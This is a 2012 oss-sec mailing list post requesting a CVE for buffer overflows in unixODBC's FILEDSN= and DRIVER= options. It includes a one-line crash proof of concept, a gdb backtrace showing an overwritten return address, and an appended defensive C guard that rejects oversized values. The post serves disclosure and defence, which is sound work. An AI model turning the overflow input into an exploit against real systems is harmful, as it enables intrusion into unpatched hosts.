oss-sec mailing list archives
CVE id request: Multiple buffer overflow in unixODBC
From: Felipe Pena <felipensp () gmail com>
Date: Tue, 29 May 2012 09:42:42 -0300
Hi, please assign a CVE id for the issue:
Multiple buffer overflow in unixODBC
===========================
The unixODBC library doesn't properly check the input from the FILEDSN= and
DRIVER= options in the DSN, which causes a buffer overflow when passed to the
SQLDriverConnect() function.
The unixODBC maintainer has been notified about the issue.
Version affected
============
FILEDSN= as of 2.0.10
DRIVER= as of 2.3.1
PoC
===
$ ./poc "FILEDSN=$(python -c "print 'A'*10000")"
Segmentation fault
(gdb) bt
#0 0x00007ffff7bc8c81 in SQLReadFileDSN (pszFileName=<value optimized out>, pszAppName=<value optimized out>, pszKeyName=<value optimized out>, pszString=<value optimized out>, nString=<value optimized out>, pnString=<value optimized out>) at SQLReadFileDSN.c:207
#1 0x4141414141414141 in ?? ()
CREDITS
=======
This bug was discovered by Felipe Pena.
BugSec Team - http://www.bugsec.com.br/
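
A caller-side guard for the issue reported above, as an added example that is not part of the original post or of unixODBC: it parses a connection string and rejects oversized FILEDSN=/DRIVER= values before the string reaches SQLDriverConnect(). The names conn_str_ok and key_is and the 255-byte cap MAX_ATTR_VALUE_LEN are assumptions made for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Assumed cap for this example; not a limit taken from unixODBC. */
#define MAX_ATTR_VALUE_LEN 255

/* Case-insensitive match of key[0..klen) against an upper-case name. */
static int key_is(const char *key, size_t klen, const char *name)
{
    if (strlen(name) != klen) return 0;
    for (size_t i = 0; i < klen; i++)
        if (toupper((unsigned char)key[i]) != name[i]) return 0;
    return 1;
}

/*
 * Walk "KEY=VALUE;KEY={VALUE};..." and return 1 only if every FILEDSN= and
 * DRIVER= value is at most max_len bytes; 0 if one is oversized or a
 * "{...}" value is unterminated.
 */
int conn_str_ok(const char *s, size_t max_len)
{
    while (*s) {
        while (*s == ' ') s++;              /* tolerate "; KEY=..." */
        const char *key = s;
        size_t klen = strcspn(s, "=;"), vlen;
        s += klen;
        if (*s != '=') {                    /* attribute without a value */
            if (*s == ';') s++;
            continue;
        }
        s++;                                /* skip '=' */
        if (*s == '{') {                    /* braced value may hold ';' */
            const char *end = strchr(s, '}');
            if (!end) return 0;
            vlen = (size_t)(end - s) + 1;
            s = end + 1;
            s += strcspn(s, ";");
        } else {
            vlen = strcspn(s, ";");
            s += vlen;
        }
        if (*s == ';') s++;
        if (vlen > max_len &&
            (key_is(key, klen, "FILEDSN") || key_is(key, klen, "DRIVER")))
            return 0;
    }
    return 1;
}
```

An application that accepts connection strings from untrusted input would call conn_str_ok(str, MAX_ATTR_VALUE_LEN) and refuse to connect when it returns 0.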
